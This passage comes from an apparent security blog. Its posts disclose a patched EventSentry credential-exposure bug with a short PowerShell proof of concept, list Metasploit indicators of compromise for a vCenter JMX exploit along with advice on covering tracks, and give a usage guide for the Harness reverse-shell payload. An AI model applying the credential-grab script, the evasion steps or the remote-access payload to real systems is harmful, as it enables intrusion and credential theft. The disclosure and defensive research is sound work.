<p>With that being said, here are some Twitter features I actually want:</p>
<ol>
<li>More granular control of my timeline. I would like to be able to display tweets within certain time-frames and by topic, and I would like to be able to set pre-sets. For example, I want all the tweets regarding CVE-2016-xxxx posted in the last 3 hours. Give me a drop down that lets me configure and control that.</li>
<li>Suppress tweet types. Some people I follow are compulsive retweeters. It’s annoying because they fill up my timeline with so much noise that it’s hard to find the signal. In contrast, their “original” tweets may be gold so I don’t want to unfollow them completely. I just want to suppress all the retweeting. Similarly, would it not be nice to suppress tweets by subject? I can think of some political rants and arguments that I’d like to remove from my timeline.</li>
<li>Silence accounts according to time of day and type. In the morning I really like to see all my news feeds from major new outlets, but after about 8am I only want breaking news and most of my timeline dedicated to InfoSec news. Instead the tweets from people I want to see get buried under the mountain of tweets by major sites trying to improve their ad revenue.</li>
<li>Rating users by signal-to-noise. It would be great to be able to rate users based on their tweets. Not for public consumption, but rather to allow for filtering. Then twitter could help apply content algorithms based on how you’ve rated followers. Users that you consistently down-vote (pick your rating system), you could choose to suppress based on tweet type (see Item 1).</li>
</ol>
<p>I might add to this list as ideas pop up, but I see so many ways Twitter can improve the user experience, but making the timeline out of order is not one of them. As a side note I would think improving user interaction would actually benefit Twitter in terms of targeted ads. This might bother some people, but not me; I’m not delusional enough to think that major websites give out these services for free.</p>
<p> </p>
<p><a href="https://bytesdarkly.com/2016/02/twitter-features-i-actually-want/">Twitter features I actually want</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on February 15, 2016.</p>https://bytesdarkly.com/2016/02/yes-someone-will-look-there-eventsentry-info-exposure-cve-2015-29112016-02-09T11:07:07-05:002016-02-09T11:07:07-05:00Richhttps://bytesdarkly.com
<h1 id="intro">Intro</h1>
<p><span style="font-weight: 400;">Information disclosure vulnerabilities are not the most exciting bugs in the business, and some bug hunters don’t even consider them worthy of note. I’m not going to weigh into that debate, but we recently came across such a bug in EventSentry, and I think it was at least worth discussing here as a case study in application security. This is a relatively minor bug – no RCE, no fancy ASLR bypass, this is simply a case where the developers probably thought no one would look there. Actually we discovered two vulnerabilities including a directory traversal – <a href="https://twitter.com/ruddawg26">@ruddawg26’s</a> write-up on that can be found </span><a href="http://securitymumblings.blogspot.com/2016/01/CVE-2015-2910.html"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">.</span></p>
<p><span style="font-weight: 400;">Before we get started I would like to point out that NETIKUS.NET ltd, the maker of EventSentry, does appear to take security seriously. There are few </span><a href="https://web.nvd.nist.gov/view/vuln/search-results?query=eventsentry&search_type=all&cves=on"><span style="font-weight: 400;">public vulnerabilities</span></a> <span style="font-weight: 400;">for EventSentry, and they were really responsive to our report. Both of our findings were patched as of </span><a href="http://www.eventsentry.com/downloads/latest-patch"><span style="font-weight: 400;">version 3.1.1.90</span></a> <span style="font-weight: 400;"> </span></p>
<h2 id="background">Background</h2>
<p><span style="font-weight: 400;">For those unfamiliar, EventSentry is a Security Information & Event Management (SIEM) solution. To paraphrase from the EventSentry website,</span></p>
<blockquote>
<p><span style="font-weight: 400;">[EventSentry] aggregates and correlate logs, alert engineers in real-time of security issues, provide insight into data through dashboards and easy to use reports and help with a variety of compliance requirements</span></p>
<p><span style="font-weight: 400;">EventSentry offers the following SIEM-related functionality:</span></p>
<ul>
<li>Real-Time Windows Event Log Monitoring with local rule processing</li>
<li><span style="font-weight: 400;">Real-Time Log File Monitoring (with local rule processing)</span></li>
<li><span style="font-weight: 400;">Complete Log Consolidation (Event Log, Log Files, Syslog, SNMP)</span></li>
<li><span style="font-weight: 400;">Correlation of various Windows security events</span></li>
<li><span style="font-weight: 400;">Forensic analysis of collected data through powerful search queries</span></li>
<li><span style="font-weight: 400;">Secure data transmission to central repository</span></li>
<li><span style="font-weight: 400;">RBAC to web-based reporting</span></li>
</ul>
<p> </p>
</blockquote>
<p><span style="font-weight: 400;">I only mention these features to highlight that EventSentry has access to a lot of data on the host which means it’s necessary for the agent to run with elevated privileges. Configurations vary, but in general the EventSentry suite consists of a management console, host agent, web reporting, and a back-end database. </span></p>
<p><span style="font-weight: 400;">The management console is capable of installing and configuring agents, updating configurations, and updating agent software across the network. It’s the configuration updates process that we’re going to focus on.</span></p>
<h1 id="cve-2015-2911">CVE-2015-2911</h1>
<p><span style="font-weight: 400;">To update agents an admin simply makes the desired configuration changes via the management console, and then pushes updates down to the agents. This push action is accomplished by sending a configuration file to each agent. The configuration file is compressed (.zip) and sent over the wire where it’s downloaded to the local installation directory. Once the zip file has been downloaded the agent unzips the file and loads the new configuration file. The EventSentry agent stores nearly all of it’s configuration settings in the Windows registry. To update the agent configuration, the software loads a .reg file with all the new settings. It’s here in this update process that, for a brief instant, information is exposed. </span></p>
<p><span style="font-weight: 400;">If you watch the install directory, </span><em><span style="font-weight: 400;">C:\Windows\SysWOW64\EVENTSENTRY</span></em><span style="font-weight: 400;">, you can actually watch the new configuration file appear during an update. By default a regular user only has READ access to this directory so manipulating the config in flight isn’t likely. From watching this behavior we can see that the programmers needed to know when the config file was ready to be loaded so they used a flag file to indicate the download was complete. This is easily seen in the image below with the appearance of the </span><em><span style="font-weight: 400;">eventsentry_svc.zip.complete</span></em> <span style="font-weight: 400;">file.</span></p>
<p><a href="/images/2016/02/eventsentry_install_path.png" rel="attachment wp-att-416"><img class="wp-image-416" src="/images/2016/02/eventsentry_install_path.png" alt="eventsentry_install_path" width="756" height="277" srcset="/images/2016/02/eventsentry_install_path.png 686w, /images/2016/02/eventsentry_install_path-300x110.png 300w" sizes="(max-width: 756px) 100vw, 756px" /></a></p>
<p style="text-align: center;">
EventSentry agent configuration update
</p>
<p><span style="font-weight: 400;">Once the flag file appears the agent unzips the <em>eventsentry_svc.zip</em> file and loads the new<em> eventsentry_svc.reg</em> configuration into the registry. After the new config is loaded the agent then deletes the .reg file because it contains, among other things, cleartext passwords!</span></p>
<h1 id="exploitation">Exploitation</h1>
<p><span style="font-weight: 400;">As I mentioned above a regular user has READ access to the install directory by default. So all we need to do is copy the <em>eventsentry_svc.zip</em> file before it’s deleted and we have access to all the configuration information that the EventSentry agent uses. There are many ways you can do this, but an easy way is to just use a quick PowerShell script. You can get as fancy as you like with this in practice, but a quick PoC is shown below:</span></p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; ;background-image: url('http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif'); padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> while(1){
$flag = “C:\Windows\SysWOW64\EVENTSENTRY\eventsentry_svc.zip.complete”
$file = “C:\Windows\SysWOW64\EVENTSENTRY\eventsentry_svc.zip”
if(Test-Path -path $flag){
try{
cp $file C:\Users\user\Desktop\eventsentry_svc.zip
break
} catch { “...” }
}
}
</code></pre>
<h1 id="information-exposure"><span style="font-weight: 400;">Information Exposure</span></h1>
<p><span style="font-weight: 400;">Searching through the .reg file there is A LOT of information. Included in the config are login credentials for the EventSentry database and any SMTP server the agent uses to send notifications as shown in the screenshots below.</span></p>
<p> </p>
<p><a href="/images/2016/02/eventsentry_dbpassword.png" rel="attachment wp-att-415"><img class="aligncenter size-full wp-image-415" src="/images/2016/02/eventsentry_dbpassword.png" alt="eventsentry_dbpassword" width="949" height="285" srcset="/images/2016/02/eventsentry_dbpassword.png 949w, /images/2016/02/eventsentry_dbpassword-300x90.png 300w, /images/2016/02/eventsentry_dbpassword-768x231.png 768w" sizes="(max-width: 949px) 100vw, 949px" /></a></p>
<p><a href="/images/2016/02/eventsentry_smtp_config.png" rel="attachment wp-att-418"><img class="aligncenter size-full wp-image-418" src="/images/2016/02/eventsentry_smtp_config.png" alt="eventsentry_smtp_config" width="558" height="676" srcset="/images/2016/02/eventsentry_smtp_config.png 558w, /images/2016/02/eventsentry_smtp_config-248x300.png 248w" sizes="(max-width: 558px) 100vw, 558px" /></a></p>
<h1 id="conclusion">Conclusion</h1>
<p>Obviously this only helps in a post-exploitation scenario, and to be perfectly honest it’s unlikely you would use this on a quick penetration test. However, once you have gained access to a system that runs the EventSentry agent why not run a small script in the background just in case the admins push an update? If you get lucky you might have just landed credentials to the EventSentry database or more. Overall, this isn’t a huge vulnerability for EventSentry, but this is the sort of thing a persistent adversary might use to gain access to more information. For the developers reading this – I understand your plight. You have a job to do which is to get a user friendly, working, product to market. Application security is hard, and it’s nearly impossible to think about all the fringe cases that may be exploited, but what choice do we have.</p>
<p><a href="https://bytesdarkly.com/2016/02/yes-someone-will-look-there-eventsentry-info-exposure-cve-2015-2911/">Yes, someone will look there – EventSentry Info Exposure – CVE-2015-2911</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on February 09, 2016.</p>https://bytesdarkly.com/2016/01/know-your-tools-cve-2015-2342-ioc-and-metasploit2016-01-18T10:52:54-05:002016-01-18T10:52:54-05:00Richhttps://bytesdarkly.com
<h3 id="this-is-a-cross-post-from-my-article-on-graytiercom-published-on-18-jan-16">[This is a cross post from my article on <a href="https://www.graytier.com/blog/know-your-tools-cve-2015-2342-ioc-and-metasploit/">graytier.com</a> published on 18 Jan 16]</h3>
<h1 id="intro">Intro</h1>
<p><span style="font-weight: 400;">As penetration testers and security professionals we now have a myriad of tools at our disposal. It seems like everyday a new product, program, or script is being released to make our jobs easier and increase our effectiveness (ok that’s debatable :). However, with all of these tools available how likely is it that most testers are taking the time to understand what’s going on behind the scenes? Arguably the most well-known penetration testing tool-suite is Metasploit. Thanks to all the hard work from the community and Rapid7 the Metasploit Framework is an amazing resource at our disposal. I’ve heard some complaints of Metasploit lately, but in my opinion there’s still nothing quite like it available. Now, we all know that it’s bad practice to download an exploit from an untrusted website and throw it at a <a href="https://dustri.org/b/how-to-radare2-a-fake-openssh-exploit.html">system without proper vetting</a>, but it’s equally important to understand the inner workings of tools you trust like Metasploit. </span></p>
<p> </p>
<p><span style="font-weight: 400;">In this post I’m going to briefly touch on how to exploit CVE-2015-2342 with Metasploit, but mostly I want to focus on the indicators of compromise (IOC) that are left behind. I’ll also show you how to cover your tracks and remove these IOC, but there’s always a chance you left some trace behind. To be clear, I’m using Metasploit to make a point because of its popularity; this isn’t a critique. </span></p>
<p> </p>
<h2 id="cve-2015-2342"><span style="font-weight: 400;">CVE-2015-2342</span></h2>
<p><span style="font-weight: 400;">For those of you that are not familiar with CVE-2015-2342 the best way to describe the vulnerability is to quote the <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2342">NVD</a>:</span></p>
<p> </p>
<blockquote>
<p><span style="font-weight: 400;">“The JMX RMI service in VMware vCenter Server 5.0 before u3e, 5.1 before u3b, 5.5 before u3, and 6.0 before u1 does not restrict registration of MBeans, which allows remote attackers to execute arbitrary code via the RMI protocol.”</span></p>
</blockquote>
<p> </p>
<p><span style="font-weight: 400;">In the most basic sense this means that an attacker can upload a malicious JAR to a vulnerable vCenter server and obtain code execution by invoking methods in that JAR remotely. This is possible because the JMI RMX service has been configured to not require any authentication. In Java-land I’m being a bit sloppy with my terminology since technically it’s an MBean, but I’m not going to cover the nuances of a Java in this post. </span></p>
<p> </p>
<h1 id="exploitation"><span style="font-weight: 400;">Exploitation</span></h1>
<p><span style="font-weight: 400;">To exploit a known vulnerability you have two choices – you can roll your own or use existing code. A really good explanation of the technical details around this type of vulnerability can be found <a href="http://www.accuvant.com/blog/exploiting-jmx-rmi">here</a></span><span style="font-weight: 400;">, and there’s no reason to re-hash that information. Most of us don’t have the time to write a new exploit for every vulnerability we come across so we rely on tools we trust to help us out. In this case we can use the <a href="https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server">exploit/multi/misc/java_jmx_server Metasploit </a>module to exploit a vulnerable server. </span></p>
<p> </p>
<p><a href="/images/2016/01/jmx_metasploit_module.png" rel="attachment wp-att-387"><img class="aligncenter size-full wp-image-387" src="/images/2016/01/jmx_metasploit_module.png" alt="jmx_metasploit_module" width="1022" height="451" srcset="/images/2016/01/jmx_metasploit_module.png 1022w, /images/2016/01/jmx_metasploit_module-300x132.png 300w, /images/2016/01/jmx_metasploit_module-768x339.png 768w" sizes="(max-width: 1022px) 100vw, 1022px" /></a></p>
<p> </p>
<p><span style="font-weight: 400;">Now all you have to do is fill in the options as usual and type exploit. With a bit of luck you should have a shell on the target system running at a high privilege level; on Windows this should be NT AUTHORITY/SYSTEM. So far this is nothing new. Most pen testers can fire off a Metasploit module, but it’s the artifacts you just left on that system that I want to go over? As a side note, I would also like to mention that the Metasploit payload was failing on some systems we tried, but more on that later.</span></p>
<p> </p>
<h1 id="behind-the-scenes"><span style="font-weight: 400;">Behind the Scenes</span></h1>
<p><span style="font-weight: 400;">What happens after you type exploit? As noted in Braden Thomas’s article, in order to upload a malicious Mbean you have to host two resources – an MLet and a JAR. Since the remote JMX console doesn’t require credentials we can then “ask” the vCenter server to load our malicious payload by invoking a method called <em>getMBeansFromURL</em>. This method takes a string variable specifying a URL as its only argument. Once invoked <em>getMBeansFromURL</em> kindly requests our payload from our local server and loads it for use on the target. Then it’s just a matter of remotely triggering our payload which, in this case, Metasploit has stuffed into the JAR. If you decided to roll your own version of this exploit the steps are the same, and you can make the payload whatever you like. Ultimately it doesn’t matter though. We’ll come back to this. </span></p>
<p> </p>
<h2 id="ioc"><span style="font-weight: 400;">IOC</span></h2>
<p><span style="font-weight: 400;">At this point you probably either have a shell, or if you’re like us the payload failed. There’s a lot that could go wrong here. We made sure to test this out in a lab so we could troubleshoot any strange behavior, but ultimately we couldn’t narrow down exactly what was stopping our Metasploit payload from calling back. After some investigation we saw that Java was throwing an exception when the payload was triggered, but rather than dig through Metasploit payload code we ultimately wrote our own exploit. Which brings me to the main point of this article – we didn’t get a shell using the Metasploit module, but just attempting left a number of artifacts on the target system. </span></p>
<p><span style="font-weight: 400;">If you connect to the target with <a href="https://en.wikipedia.org/wiki/JConsole">JConsole</a> you can plainly see a number of items that look out of place. Lets look a before-and-after of the JConsole</span></p>
<p> </p>
<p><a href="/images/2016/01/jconsole_jmx_before_metasploit2.png" rel="attachment wp-att-390"><img class="aligncenter wp-image-390" src="/images/2016/01/jconsole_jmx_before_metasploit2.png" alt="jconsole_jmx_before_metasploit2" width="698" height="421" srcset="/images/2016/01/jconsole_jmx_before_metasploit2.png 841w, /images/2016/01/jconsole_jmx_before_metasploit2-300x181.png 300w, /images/2016/01/jconsole_jmx_before_metasploit2-768x463.png 768w" sizes="(max-width: 698px) 100vw, 698px" /></a></p>
<p style="text-align: center;">
JConsole before exploit attempt
</p>
<p> </p>
<p><a href="/images/2016/01/jmx_metasploit_module_exploit_attempt-3.png" rel="attachment wp-att-391"><img class="aligncenter size-large wp-image-391" src="/images/2016/01/jmx_metasploit_module_exploit_attempt-3-1024x677.png" alt="jmx_metasploit_module_exploit_attempt (3)" width="700" height="463" srcset="/images/2016/01/jmx_metasploit_module_exploit_attempt-3-1024x677.png 1024w, /images/2016/01/jmx_metasploit_module_exploit_attempt-3-300x198.png 300w, /images/2016/01/jmx_metasploit_module_exploit_attempt-3-768x508.png 768w, /images/2016/01/jmx_metasploit_module_exploit_attempt-3.png 1106w" sizes="(max-width: 700px) 100vw, 700px" /></a></p>
<p style="text-align: center;">
JConsole after exploit attempt
</p>
<p> </p>
<p><span style="font-weight: 400;">The first noticeable indicator you can see is the <strong><em>MLetNiulcijyo</em></strong> MLet now in the list. If you’re following along at home this name will vary because the name is just MLet concatenated with a random string. Strings like this are very Metasploit-ish. Randomly generated strings are used throughout the framework in one way or another. Expanding this MLet you can also see it contains an object called <strong><em>jmxpayload</em></strong>, and under that you can see it exposes a <strong><em>run</em></strong> method that can be invoked remotely. Network defenders take note that if you’re looking at a production system and see this, <em><strong>now</strong></em> is the time to spin up you IR procedures. </span></p>
<p><span style="font-weight: 400;">You can also see a new entry, <strong><em>DefaultDomain</em></strong>, has appeared towards the top of the list. This alone is not necessarily an IOC. However, expanding this field you can see we have an MLet sub-directory and further expanding reveals <strong><em>Operations</em></strong> and <strong><em>Attributes</em></strong> sub-directories. Under the Operations directory we see the most helpful <em>getMBeansFromURL</em> method exposed, but the main IOC I wanted to point is under the <strong><em>Attributes ->URLs</em></strong> path. Clicking on the URLs attribute clearly shows the IP of our attacking machine! Obviously, this is likely a pivot point because no one has this service exposed to the Internet right? Anyway, as far as IR is concerned it doesn’t get much easier than this to find the next host to investigate. </span></p>
<p><span style="font-weight: 400;">As a responder the next question you should be asking yourself is what’s in that payload? Well it turns out that the entire JAR is copied to a temp directory on the vCenter server. A file I’m sure your forensic team would like to have a look at. In our lab the JAR was contained at the path below: </span></p>
<p> </p>
<p style="text-align: center;">
<em><span style="font-weight: 400;">C:\Program Files\VMWare\Infrastructure\vSphereWebClient\server\tmp</span></em>
</p>
<p> </p>
<p><a href="/images/2016/01/temp_dir_with_jar.png" rel="attachment wp-att-389"><img class="aligncenter wp-image-389" src="/images/2016/01/temp_dir_with_jar.png" alt="temp_dir_with_jar" width="675" height="404" srcset="/images/2016/01/temp_dir_with_jar.png 1012w, /images/2016/01/temp_dir_with_jar-300x180.png 300w, /images/2016/01/temp_dir_with_jar-768x460.png 768w" sizes="(max-width: 675px) 100vw, 675px" /></a></p>
<p> </p>
<p><span style="font-weight: 400;">If you’re part of an IR team, at this point, you can be fairly certain that a Metasploit module has probably been fired at this server. Although I want to stress that these IOCs are not Metasploit specific – they are exploit specific! If you rolled your own version of this you’re still likely to see the DefaultDomain and another new MLet appear in the list. </span></p>
<p> </p>
<h1 id="covering-your-tracks"><span style="font-weight: 400;">Covering your tracks</span></h1>
<p><span style="font-weight: 400;">You can try to cover your tracks by either modify the Metasploit module to make the MLet look less noticeable (e.g. rename your payload to MLetText or something like that) or create your own version with different names and methods. Regardless, you’re still going to have similar artifacts on the target system. The only difference is you’ll be making it slightly harder for admins and incident responders to find you. Although, as far as I can tell, the <strong><em>DefaultDomain</em></strong> MLet will always be created and point right back to you. So with all this in mind how do we cover our tracks? Well, thanks to some research by <a href="https://twitter.com/ruddawg26">@ruddawg26</a></span><span style="font-weight: 400;"><a href="https://twitter.com/ruddawg26"> </a>it turns out that all you have to do is restart the <em>vspherewebclient</em> service to wipe the slate clean. You already have SYSTEM level access on the server so using the </span><strong>net</strong> <span style="font-weight: 400;">command on Windows should be sufficient. Of course the downside to this method is that restarting a service could show up as a red flag in the event logs, but it certainly makes it harder to track you down.</span></p>
<p> </p>
<h1 id="conclusion"><span style="font-weight: 400;">Conclusion</span></h1>
<p><span style="font-weight: 400;">Know your tools. In this case Metasploit was working exactly as advertised. Pen testers it’s your job to know what your tools are doing. Even if you trust the source it’s important to know what affects you’re having on a target system. Defenders if you see any of these IOC on your vCenter servers you need to be worried! CVE-2015-2342 is a serious vulnerability that can be fixed relatively easily. No one should be getting owned by this vulnerability at this point in the game. Lastly, keep this in mind when you’re hiring penetration testers or Red Teams. Maybe a previous assessment left these artifacts on your network, but the only way to know is to spend the time and money going through the IR process after the fact. Make sure you’re picking the right team.</span></p>
<p> </p>
<p><a href="https://bytesdarkly.com/2016/01/know-your-tools-cve-2015-2342-ioc-and-metasploit/">Know your tools – CVE-2015-2342 IOC and Metasploit</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on January 18, 2016.</p>https://bytesdarkly.com/2016/01/frogstarworldc-is-now-bytesdarkly2016-01-12T16:49:09-05:002016-01-12T16:49:09-05:00Richhttps://bytesdarkly.com
<p>If you clicked on a link to frogstarworldc.com and ended up at bytesdarkly.com then don’t worry you’re still in the right place. I decided to rebrand the blog to align more with the main topic – InfoSec. All of the old links still work so this shouldn’t change much for the few visitors that stumble upon my ramblings. Cheers!</p>
<p><a href="https://bytesdarkly.com/2016/01/frogstarworldc-is-now-bytesdarkly/">FrogstarworldC is now BytesDarkly</a> was originally published by Rich at <a href="https://bytesdarkly.com">Bytesdarkly</a> on January 12, 2016.</p>https://bytesdarkly.com/2015/10/harness-intro-and-usage-guide2015-10-04T08:28:10-05:002015-10-04T08:28:10-05:00Richhttps://bytesdarkly.com
<h1 id="intro">Intro</h1>
<p>At DefCon 23 I released a beta version of a project I was working on called <a href="https://github.com/Rich5/Harness">Harness</a>. Harness is remote access payload with the ability to provide a remote interactive PowerShell interface from a Windows system to virtually any TCP socket. The primary goal of the Harness Project is to provide a remote interface with the same capabilities and overall feel of the native PowerShell executable bundled with the Windows. At the time of release I did not have a good usage guide available so this article is intended to serve as an introduction and basic usage guide.</p>
<p>As of 25 September 2015 Harness 1.0 is available for download with added features and bug fixes. I’ve been slowly adding much of this information to the github wiki where the project source code is located.</p>
<h1 id="goals">Goals</h1>
<p>When I started the project I had two goals in mind:</p>
<ol>
<li>I wanted a fully interactive remote PowerShell console with the same capabilities as the native PowerShell.exe</li>
<li>The ability to seamlessly import modules across the wire</li>
</ol>
<h1 id="architecture">Architecture</h1>
<h2 id="server">Server</h2>
<p>Of course Harness follows the client-server model common across the Internet. For the purposes of this guide, and clarity, the Harness payload is the server and any TCP listener can be the client. For example, Harness will easily work with netcat; however, some of the more advanced features (e.g. ^import-module) built into Harness requires a companion handler that supports the built-in commands.</p>
<h2 id="native-client">Native Client</h2>
<p>The native Harness handler is contained within the <em>PSHandler</em> module. The <em>PSHandler</em> module implements the special command ^import-module that gives Harness the ability to import modules across the wire without staging PowerShell scripts on a web server. <em>PSHandler</em> is currently an experimental handler utilizing the Python asyncio library included in the Python 3.4 and above; however using asyncio is <strong>not</strong> necessarily required and implementing the ^import-module command in other handlers should be straight forward. See <a href="https://github.com/Rich5/Harness/wiki/Development">Development</a> section of the wiki for more implementation details.</p>
<h1 id="installation">Installation</h1>
<h2 id="installing-python-34">Installing Python 3.4</h2>
<p>Many developers have not moved to Python 3.x, and believe me I get it. There were some major changes in Python 3, and people are resistant to change. So we continue to see more and more tools being pushed out written in Python 2.7. There’s nothing wrong with this in practice although new features will not be available for Python 2 by default. I wanted to limit the use of external libraries that users would have to install, so instead I opted to develop the framework in Python 3.4 to take advantage of new standard libraries like asyncio. Yes, I could have accomplished a solution in Python 2 also, but I didn’t. Luckily, it’s really easy to run Python 2 and Python 3 side-by-side. I’ve included a simple bash script to quickly download, build, and install Python 3.4 as an alternate install. To download and install Harness you can run the following commands on your Linux system:</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> git clone https://github.com/Rich5/Harness.git
cd Harness/
chmod 755 python_install.sh
./python_install.sh
</code></pre>
<p>python_install.sh will run the following commands to download and install Python 3.4.</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall
</code></pre>
<p>Once installed start the framework by running:</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> Python3.4 harness.py
</code></pre>
<p> </p>
<p><a href="/images/2015/10/harness_main.png"><img class="aligncenter size-full wp-image-358" src="/images/2015/10/harness_main.png" alt="harness_main" width="533" height="424" srcset="/images/2015/10/harness_main.png 533w, /images/2015/10/harness_main-300x239.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></a></p>
<p> </p>
<h1 id="client-framework">Client Framework</h1>
<p>Harness is bundled in a small modular framework written in Python; however, the intent is for users to ultimately incorporate the server into their own toolsets if useful. With so many tools, frameworks, etc. there are far more refined security testing frameworks available. Typing <strong><em>show modules</em></strong> will display the available modules:</p>
<p><a href="/images/2015/10/harness_showmodules.png"><img class="aligncenter size-full wp-image-362" src="/images/2015/10/harness_showmodules.png" alt="harness_showmodules" width="722" height="334" srcset="/images/2015/10/harness_showmodules.png 722w, /images/2015/10/harness_showmodules-300x139.png 300w" sizes="(max-width: 722px) 100vw, 722px" /></a></p>
<p> </p>
<h1 id="payloads">Payloads</h1>
<p>Generating payloads is fairly straight forward. To load a module type **_load <module name="">_** to enter into the module sub-prompt. Then using the familiar **_show_** and **_set_** commands you can configure the payload. All modules are executed by typing **run** at the prompt. Payload modules will then ask you to specify a location to save the file.</module></p>
<p><a href="/images/2015/10/harness_load_module_x86exe.png"><img class="aligncenter size-full wp-image-357" src="/images/2015/10/harness_load_module_x86exe.png" alt="harness_load_module_x86exe" width="724" height="388" srcset="/images/2015/10/harness_load_module_x86exe.png 724w, /images/2015/10/harness_load_module_x86exe-300x161.png 300w" sizes="(max-width: 724px) 100vw, 724px" /></a></p>
<p>It’s up to the user to determine how to get the payload on the target. Executable payloads may be dropped to disk, and reflective payloads can be injected into a process using various techniques including <a href="https://www.rapid7.com/db/modules/post/windows/manage/reflective_dll_inject" target="_blank">Metasploit’s reflective dll inject module</a>. In the future delivery modules will be included to take advantage of the usual attack vectors (staged payload, macro, PowerShell download, etc).</p>
<p> </p>
<h1 id="starting-the-listener">Starting the Listener</h1>
<p>Loading the native handler is similar to any other module. Simply set the IP and PORT you want to listen on and type run.</p>
<p><a href="/images/2015/10/harness_run_handler.png"><img class="aligncenter size-large wp-image-360" src="/images/2015/10/harness_run_handler-1024x384.png" alt="harness_run_handler" width="700" height="263" srcset="/images/2015/10/harness_run_handler-1024x384.png 1024w, /images/2015/10/harness_run_handler-300x113.png 300w, /images/2015/10/harness_run_handler.png 1104w" sizes="(max-width: 700px) 100vw, 700px" /></a></p>
<p>As you can see the handler module is forced to run the background by design, and you now have a listener running on port 80. Multiple connections can be handled by the same handler. By default the handler is listening for SSL connections. This is not required, but should you want to use SSL you’ll need to generate your own self-signed certificates, and set the CERT_PATH and KEY_PATH variables accordingly.</p>
<p>On Linux a simple way to generate a self-signed certificate is with the following line:</p>
<pre style="font-family: arial; font-size: 12px; border: 1px dashed #CCCCCC; width: 99%; height: auto; overflow: auto; background: #f0f0f0; padding: 0px; color: #000000; text-align: left; line-height: 20px;"><code style="color: #000000; word-wrap: normal;"> openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout server.key -out server.cert
</code></pre>
<h1 id="shell">Shell</h1>
<p>Currently the payload is a reverse shell, although there’s code for a bind shell already implemented in the source, and could easily be used if someone is motivated enough. Once the payload is executed a session is registered with the framework and is available with the session command.</p>
<p><a href="/images/2015/10/harness_gaining_shell.png"><img class="aligncenter size-full wp-image-355" src="/images/2015/10/harness_gaining_shell.png" alt="harness_gaining_shell" width="923" height="380" srcset="/images/2015/10/harness_gaining_shell.png 923w, /images/2015/10/harness_gaining_shell-300x124.png 300w" sizes="(max-width: 923px) 100vw, 923px" /></a></p>
<p>Typing **_session <session number="">_** will present you with the familiar PowerShell prompt. Harness is a completely custom host implemented in C# and C++. That means that all the features of the native PowerShell.exe had to be implemented by hand. Most of the host methods have been implemented in some capacity, but not all, and certainly not as well as the Microsoft developers did with the native executable. What this means is that most users will not notice much difference in their experience, but some of the more complex scripts may not function as expected. It’s impossible to test all the scripts that any given user may try. So if you come across a bug or strange behavior please submit a bug report on Github. As with all things I recommend testing thoroughly in the lab before trying out a technique on a target system.</session></p>
<h1 id="special-commands">Special Commands</h1>
<p>Harness is intended to allow the user to utilize their own PowerShell scripts as a custom toolkit, but there some special commands that give Harness additional functionality. Commands prefixed with the ^ character indicate that special handling is required. The special commands can be handled on the client side, server side, or both. For example, the <strong><em>^import-module </em></strong>function requires handling on both the client and server while the <strong><em>^enable-format</em></strong> command is only handled on the server side.</p>
<h2 id="import-module">^Import-Module</h2>
<p>Allows the user to seamlessly import any PowerShell module remotely without requiring staging.</p>
<h3 id="usage-import-module-">Usage: ^import-module <path to="" ps1="" file=""></path></h3>
<p><a href="/images/2015/10/harness_import_module.png"><img class="aligncenter size-full wp-image-356" src="/images/2015/10/harness_import_module.png" alt="harness_import_module" width="1014" height="156" srcset="/images/2015/10/harness_import_module.png 1014w, /images/2015/10/harness_import_module-300x46.png 300w" sizes="(max-width: 1014px) 100vw, 1014px" /></a></p>
<p>The framework will take care of base64 encoding the file and sending it across the wire. In the event there is file corruption, during transfer, the Harness payload will usually alert you that there is a parse error and to try again. Once a module has been imported you may call the functions as usual. The example below show calling <em>I<strong>nvoke-AllChecks</strong></em> from <a href="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp" target="_blank">PowerUp</a>.</p>
<p><a href="/images/2015/10/harness_run_PowerUp.png"><img class="aligncenter size-full wp-image-361" src="/images/2015/10/harness_run_PowerUp.png" alt="harness_run_PowerUp" width="658" height="310" srcset="/images/2015/10/harness_run_PowerUp.png 658w, /images/2015/10/harness_run_PowerUp-300x141.png 300w" sizes="(max-width: 658px) 100vw, 658px" /></a></p>
<h2 id="end-and-multiline-input">^End and Multiline Input</h2>
<p>One of the nice features of the native PowerShell.exe in that users can enter multi-line input. This makes it easy to construct simple functions or more complex command sequences on the fly. Harness implements multi-line input using a simple accumulator loop in conjunction with a PowerShell syntax parser. Every command sent to the server is checked for syntax errors. If parse errors are found the server sets a flag, changes the prompt (e.g. ») to indicate multi-line input, and starts accumulating input until the script is complete. To break out of multi-line input use the <strong><em>^end</em></strong> special command rather than attempt CTRL-C.</p>
<h3 id="usage-end">Usage: ^end</h3>
